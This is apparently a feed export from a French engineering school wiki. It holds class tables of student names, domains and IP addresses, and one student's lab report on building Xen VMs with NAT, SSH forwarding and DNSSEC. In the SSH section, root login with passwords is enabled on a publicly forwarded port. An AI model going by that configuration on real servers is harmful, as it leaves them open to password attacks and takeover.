| Routeur C9200-E306 || 172.27.0.2/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 || 172.27.0.3/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 || 172.27.0.4/16&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12138</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12138"/>
		<updated>2026-02-10T13:52:39Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Tableau des réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|SALHI&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.20.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GOURVEST/GHAZALI&lt;br /&gt;
|pont_diviseur&lt;br /&gt;
|192.168.67.0/24&lt;br /&gt;
|-&lt;br /&gt;
|YAHIANI / TEPELI&lt;br /&gt;
|pontclio&lt;br /&gt;
|192.168.7.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GAUTHIER / SOUOP METSE&lt;br /&gt;
|pont_rock&lt;br /&gt;
|192.168.50.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|E1_Pierre&lt;br /&gt;
|11&lt;br /&gt;
|-&lt;br /&gt;
|E2_Agathe&lt;br /&gt;
|12&lt;br /&gt;
|&lt;br /&gt;
|E15_MSalhi&lt;br /&gt;
|13&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 || 172.27.0.1/16&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 || 172.27.0.2/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 || 172.27.0.3/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 || 172.27.0.4/16&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12004</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12004"/>
		<updated>2026-02-02T09:35:39Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Rapport de Projet SE4 IdO&amp;lt;br /&amp;gt;&lt;br /&gt;
Sécurité Système/Réseau'''&lt;br /&gt;
&lt;br /&gt;
'''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''&lt;br /&gt;
&lt;br /&gt;
'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''École Polytechnique Universitaire de Lille'''&lt;br /&gt;
&lt;br /&gt;
2026-02-02&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;création-des-machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Création des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 &amp;lt;code&amp;gt;capbreton.plil.info&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;commandes-de-création&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Commandes de création ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création de la machine de services SE4.Moon&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
# Création de la machine mandataire SE4.Solstice&lt;br /&gt;
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \&lt;br /&gt;
  --bridge=pontKS --dir=/usr/local/xen --size=10GB \&lt;br /&gt;
  --dist=daedalus --memory=2048M --force&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;démarrage-et-connexion&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Démarrage et connexion ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Démarrage des VMs&lt;br /&gt;
xen create /etc/xen/SE4.Moon.cfg&lt;br /&gt;
xen create /etc/xen/SE4.Solstice.cfg&lt;br /&gt;
&lt;br /&gt;
# Connexion aux consoles&lt;br /&gt;
xen console SE4.Moon&lt;br /&gt;
xen console SE4.Solstice&lt;br /&gt;
&lt;br /&gt;
# Liste des VMs actives&lt;br /&gt;
root@capbreton:~# xen list&lt;br /&gt;
Name                                        ID   Mem VCPUs    State   Time(s)&lt;br /&gt;
SE4.Solstice                                39  2048     1     -b----    2560.1&lt;br /&gt;
SE4.Moon                                   119  2048     1     -b----     452.3&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-de-services-se4.moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine de services (SE4.Moon) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;montage-des-partitions-lvm-pour-var-et-home&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Montage des partitions LVM pour /var et /home ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création des fichiers de partition sur le Dom0&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual&lt;br /&gt;
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual&lt;br /&gt;
&lt;br /&gt;
# Modification du fichier de configuration Xen&lt;br /&gt;
disk = [&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',&lt;br /&gt;
    'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.home,xvdb,w',&lt;br /&gt;
    'phy:/dev/virtual/SE4.Moon.var,xvdc,w',&lt;br /&gt;
]&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;formatage-et-montage-des-partitions&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Formatage et montage des partitions ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Formatage des partitions&lt;br /&gt;
mkfs -t ext4 /dev/xvdb&lt;br /&gt;
mkfs -t ext4 /dev/xvdc&lt;br /&gt;
&lt;br /&gt;
# Montage temporaire et copie des données&lt;br /&gt;
mount /dev/xvdc /mnt&lt;br /&gt;
mv /var/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
mount /dev/xvdb /mnt&lt;br /&gt;
mv /home/* /mnt/&lt;br /&gt;
umount /mnt&lt;br /&gt;
&lt;br /&gt;
# Configuration du fstab&lt;br /&gt;
cat &amp;gt; /etc/fstab &amp;lt;&amp;lt; EOF&lt;br /&gt;
/dev/xvda1 none swap sw 0 0&lt;br /&gt;
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
/dev/xvdb /home ext4 defaults 0 2&lt;br /&gt;
/dev/xvdc /var ext4 defaults 0 2&lt;br /&gt;
EOF&lt;br /&gt;
&lt;br /&gt;
# Application des modifications&lt;br /&gt;
mount -a&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface réseau privée (vers Solstice)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.2/24&lt;br /&gt;
    gateway 192.168.20.1&lt;br /&gt;
&lt;br /&gt;
# Configuration IPv6 automatique&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Moon:~# ip a show eth0&lt;br /&gt;
2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;installation-des-paquets-de-base&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Installation des paquets de base ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;apt update &amp;amp;&amp;amp; apt upgrade -y&lt;br /&gt;
apt install -y ssh apache2 bind9 bind9utils \&lt;br /&gt;
  fail2ban openssl iptables-persistent \&lt;br /&gt;
  net-tools curl wget vim&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-de-la-machine-mandataire-se4.solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Configuration de la machine mandataire (SE4.Solstice) ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-réseau-1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration réseau ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/network/interfaces&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Interface publique (réseau routé)&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
    address 193.48.57.167/27&lt;br /&gt;
    gateway 193.48.57.162  # Adresse VRRP virtuelle&lt;br /&gt;
&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Interface privée (vers Moon)&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.20.1/24&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
root@Solstice:~# ip a show eth1&lt;br /&gt;
3: eth1: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP&lt;br /&gt;
    inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1&lt;br /&gt;
    inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;mise-en-place-de-la-mascarade-nat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Mise en place de la mascarade (NAT) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Activation du forwarding IP&lt;br /&gt;
echo &amp;quot;net.ipv4.ip_forward=1&amp;quot; &amp;gt;&amp;gt; /etc/sysctl.conf&lt;br /&gt;
sysctl -p&lt;br /&gt;
&lt;br /&gt;
# Règles iptables pour la mascarade&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT&lt;br /&gt;
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde pour persistance&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Ajout dans interfaces pour chargement au démarrage&lt;br /&gt;
post-up iptables-restore &amp;lt; /etc/iptables/rules.v4&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;services-internet&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Services Internet =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-ssh&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur SSH ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-ssh-sur-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration SSH sur Moon ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Édition du fichier de configuration&lt;br /&gt;
vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
# Modifications apportées :&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
PasswordAuthentication yes&lt;br /&gt;
Port 22&lt;br /&gt;
# LogLevel VERBOSE&lt;br /&gt;
&lt;br /&gt;
# Redémarrage du service&lt;br /&gt;
systemctl restart ssh&lt;br /&gt;
systemctl enable ssh&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;redirection-de-ports-pour-laccès-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Redirection de ports pour l’accès IPv4 ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Redirection du port 2201 vers Moon (SSH)&lt;br /&gt;
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \&lt;br /&gt;
  -j DNAT --to-destination 192.168.20.2:22&lt;br /&gt;
&lt;br /&gt;
iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT&lt;br /&gt;
&lt;br /&gt;
# Sauvegarde&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&lt;br /&gt;
# Test de la redirection&lt;br /&gt;
ssh -p 2201 root@193.48.57.167  # Arrive sur Moon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;serveur-dns&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { 192.168.20.1; };  # Solstice comme secondaire&lt;br /&gt;
    also-notify { 192.168.20.1; };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL    86400&lt;br /&gt;
@       IN      SOA     ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
                        2026020203      ; Serial&lt;br /&gt;
                        3600            ; Refresh&lt;br /&gt;
                        1800            ; Retry&lt;br /&gt;
                        604800          ; Expire&lt;br /&gt;
                        86400 )         ; Minimum TTL&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN      NS      ns1.msalhi.online.&lt;br /&gt;
@       IN      NS      ns2.msalhi.online.&lt;br /&gt;
&lt;br /&gt;
; Glue records&lt;br /&gt;
ns1     IN      AAAA    2001:660:4401:60a0:216:3eff:fe6f:f547&lt;br /&gt;
ns2     IN      A       193.48.57.167&lt;br /&gt;
&lt;br /&gt;
; Enregistrements principaux&lt;br /&gt;
@       IN      A       193.48.57.167&lt;br /&gt;
@       IN      AAAA    2001:660:4401:60a0:216:3eff:fe6f:f547&lt;br /&gt;
www     IN      CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
